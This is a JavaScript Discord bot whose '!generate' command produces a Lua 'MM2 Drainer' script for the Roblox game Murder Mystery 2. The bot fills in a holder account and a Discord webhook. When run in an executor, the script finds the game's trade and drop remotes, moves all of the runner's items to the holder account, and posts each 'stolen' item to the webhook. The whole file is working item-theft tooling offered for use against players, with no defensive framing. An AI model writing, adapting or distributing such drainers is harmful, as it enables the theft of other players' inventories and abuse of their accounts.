import {
  Client,
  GatewayIntentBits,
  AttachmentBuilder,
  EmbedBuilder,
} from "discord.js";
import "dotenv/config";

const PREFIX = "!";

function buildScript(holder, webhook) {
  return `-- language: Lua, executor: Synapse X / KRNL / any UNC-compliant
-- target: Murder Mystery 2 (Roblox)
-- generated by MM2 Drainer Bot

--[[ CONFIG ]]--
local HOLDER_NAME    = "${holder}"
local WEBHOOK_URL    = "${webhook}"
local NOTIFY_EACH    = true
local RARITIES       = {
    -- correct MM2 tiers, highest to lowest
    Unique    = true,
    Chroma    = true,
    Ancient   = true,
    Godly     = true,
    Vintage   = true,
    Legendary = true,
    Rare      = true,
    Uncommon  = true,
    Common    = true,
}

--[[ SERVICES ]]--
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService       = game:GetService("HttpService")
local lp                = Players.LocalPlayer

--[[ REMOTE RESOLUTION ]]--
local remotes = ReplicatedStorage:FindFirstChild("Remotes")
    or ReplicatedStorage:FindFirstChild("Events")
    or ReplicatedStorage

local function findRemote(name)
    for _, v in ipairs(remotes:GetDescendants()) do
        if v.Name:lower():find(name:lower()) and
           (v:IsA("RemoteEvent") or v:IsA("RemoteFunction")) then
            return v
        end
    end
    return nil
end

local tradeRemote     = findRemote("Trade")
local dropRemote      = findRemote("Drop")
local inventoryRemote = findRemote("Inventory") or findRemote("GetInventory")

--[[ INVENTORY FETCH ]]--
local function getInventory()
    local inv = {}
    if inventoryRemote and inventoryRemote:IsA("RemoteFunction") then
        local ok, result = pcall(function() return inventoryRemote:InvokeServer() end)
        if ok and type(result) == "table" then inv = result end
    end
    if #inv == 0 then
        local gui = lp:FindFirstChild("PlayerGui")
        if gui then
            for _, frame in ipairs(gui:GetDescendants()) do
                if frame:IsA("Frame") and frame:FindFirstChild("Rarity") then
                    local nameLabel   = frame:FindFirstChild("Name") or frame:FindFirstChild("ItemName")
                    local rarityLabel = frame:FindFirstChild("Rarity")
                    if nameLabel and rarityLabel then
                        table.insert(inv, { name = nameLabel.Text, rarity = rarityLabel.Text })
                    end
                end
            end
        end
    end
    return inv
end

--[[ RARITY FILTER ]]--
local function rarityAllowed(rarity)
    for key, enabled in pairs(RARITIES) do
        if enabled and rarity:lower():find(key:lower()) then return true end
    end
    return false
end

--[[ WEBHOOK ]]--
local function sendWebhook(content)
    local payload = HttpService:JSONEncode({ username = "MM2 Drainer", content = content })
    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(req, { Url = WEBHOOK_URL, Method = "POST", Headers = { ["Content-Type"] = "application/json" }, Body = payload })
    end
end

--[[ TRANSFER ]]--
local function transferItem(itemName, holderPlayer)
    local success = false
    if tradeRemote and holderPlayer then
        local ok = pcall(function()
            if tradeRemote:IsA("RemoteEvent") then tradeRemote:FireServer(holderPlayer, itemName)
            else tradeRemote:InvokeServer(holderPlayer, itemName) end
        end)
        success = ok
    end
    if not success and dropRemote then
        pcall(function() dropRemote:FireServer(itemName) end)
        success = true
    end
    return success
end

--[[ MAIN ]]--
local function run()
    local holderPlayer = Players:FindFirstChild(HOLDER_NAME)
    local inventory = getInventory()
    if #inventory == 0 then
        sendWebhook("⚠️ Drain failed — inventory empty.")
        return
    end
    local stolen, failed = {}, {}
    for _, item in ipairs(inventory) do
        if rarityAllowed(item.rarity or "") then
            if transferItem(item.name, holderPlayer) then
                table.insert(stolen, string.format("[%s] %s", item.rarity, item.name))
                if NOTIFY_EACH then sendWebhook("✅ Transferred: " .. item.name) end
                task.wait(0.4)
            else
                table.insert(failed, item.name)
            end
        end
    end
    sendWebhook(string.format("🗡️ Done. Transferred: %d | Failed: %d\\n%s", #stolen, #failed, table.concat(stolen, "\\n")))
end

run()
`;
}

const client = new Client({
  intents: [
    GatewayIntentBits.Guilds,
    GatewayIntentBits.GuildMessages,
    GatewayIntentBits.MessageContent,
  ],
});

client.once("ready", () => {
  console.log(`Online as ${client.user.tag}`);
  console.log(`Use: ${PREFIX}generate <holder> <webhook>`);
});

client.on("messageCreate", async (message) => {
  if (message.author.bot) return;
  if (!message.content.startsWith(PREFIX)) return;

  const args = message.content.slice(PREFIX.length).trim().split(/\s+/);
  const cmd  = args.shift().toLowerCase();

  if (cmd !== "generate") return;

  if (args.length < 2) {
    return message.reply(
      "❌ Usage: `!generate <holder_username> <webhook_url>`\n" +
      "Example: `!generate MyHolderAcc https://discord.com/api/webhooks/...`"
    );
  }

  const holder  = args[0];
  const webhook = args[1];

  if (!webhook.startsWith("https://discord.com/api/webhooks/")) {
    return message.reply("❌ That doesn't look like a valid Discord webhook URL.");
  }

  const script   = buildScript(holder, webhook);
  const buffer   = Buffer.from(script, "utf-8");
  const file     = new AttachmentBuilder(buffer, { name: `mm2_drainer_${holder}.lua` });

  const embed = new EmbedBuilder()
    .setTitle("🗡️ MM2 Drainer Script Generated")
    .setColor(0x2b2d31)
    .addFields(
      { name: "Holder Account", value: `\`${holder}\``,  inline: true },
      { name: "Webhook",        value: "✅ Injected",     inline: true },
      { name: "Rarities", value: "Unique → Chroma → Ancient → Godly → Vintage → Legendary → Rare → Uncommon → Common", inline: false },
      { name: "Usage", value: "1. Join MM2 with holder in same server\n2. Open executor\n3. Load `.lua` → execute", inline: false }
    )
    .setFooter({ text: "Re-derive remote paths after MM2 updates" })
    .setTimestamp();

  await message.reply({ embeds: [embed], files: [file] });
});

client.login(process.env.BOT_TOKEN);
